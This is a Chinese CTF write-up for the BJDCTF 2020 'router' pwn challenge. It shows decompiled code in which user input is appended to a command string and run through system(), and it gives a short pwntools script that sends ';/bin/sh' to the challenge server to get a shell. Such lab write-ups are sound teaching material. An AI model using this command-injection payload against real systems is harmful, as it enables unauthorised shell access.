bjdctf 2020 router

# bjdctf 2020 router

# 前提

# 查看文件保护

[*] '/root/pwn/buuctf/bjdctf_2020_router/bjdctf_2020_router'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

1
2
3
4
5
6

# 静态分析

主函数如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+Ch] [rbp-74h]
  char buf; // [rsp+10h] [rbp-70h]
  char dest[8]; // [rsp+20h] [rbp-60h]
  __int64 v6; // [rsp+28h] [rbp-58h]
  int v7; // [rsp+30h] [rbp-50h]
  char v8; // [rsp+34h] [rbp-4Ch]
  char v9; // [rsp+40h] [rbp-40h]
  unsigned __int64 v10; // [rsp+78h] [rbp-8h]

  v10 = __readfsqword(0x28u);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  *(_QWORD *)dest = 139174242672LL;
  v6 = 0LL;
  v7 = 0;
  v8 = 0;
  v3 = 0;
  puts("Welcome to BJDCTF router test program! ");
  while ( 1 )
  {
    menu();
    puts("Please input u choose:");
    v3 = 0;
    __isoc99_scanf("%d", &v3);
    switch ( v3 )
    {
      case 1:
        puts("Please input the ip address:");
        read(0, &buf, 0x10uLL);
        strcat(dest, &buf);                     // 这里拼接了指令
        system(dest);
        puts("done!");
        break;
      case 2:
        puts("bibibibbibibib~~~");
        sleep(3u);
        puts("ziziizzizi~~~");
        sleep(3u);
        puts("something wrong!");
        puts("Test done!");
        break;
      case 3:
        puts("Please input what u want to say");
        puts("Your suggest will help us to do better!");
        read(0, &v9, 0x3AuLL);
        printf("Dear ctfer,your suggest is :%s", &v9);
        break;
      case 4:
        puts("Hey guys,u think too much!");
        break;
      case 5:
        puts("Good Bye!");
        exit(-1);
        return;
      default:
        puts("Functional development!");
        break;
    }
  }
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62

menu函数如下

int menu()
{
  puts("1.ping");
  puts("2.test");
  puts("3.leave comments");
  puts("4.root");
  return puts("5.exit");
}

1
2
3
4
5
6
7
8

# 思路分析

目前信息：

case 1:
        puts("Please input the ip address:");
        read(0, &buf, 0x10uLL);
        strcat(dest, &buf);                     // 这里拼接了指令
        system(dest);
        puts("done!");
        break;

1
2
3
4
5
6
7

strcat函数把dest和buf进行了拼接，然后system使用了拼接后的结果作为参数执行
No canary found
NX enabled
No PIE

思路：
- 执行sytem("ls";" bin/sh")的效果等效执行sytem("ls")加sytem("bin/sh")，所以本题直接在执行到case 1时输入;/bin/sh即可

# exp

from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/bjdctf_2020_router/bjdctf_2020_router'
io = remote('node4.buuoj.cn', 25702)
# io = process(pwnfile)
io.recvuntil('Please input u choose:\n')
io.sendline("1")
io.recv()
io.send(";/bin/sh")
io.interactive()

1
2
3
4
5
6
7
8
9
10
11

#buuctf #pwn #StackOverflow

上次更新: 2022/08/15, 00:29:49

← wustctf2020 getshell hitcontraining uaf→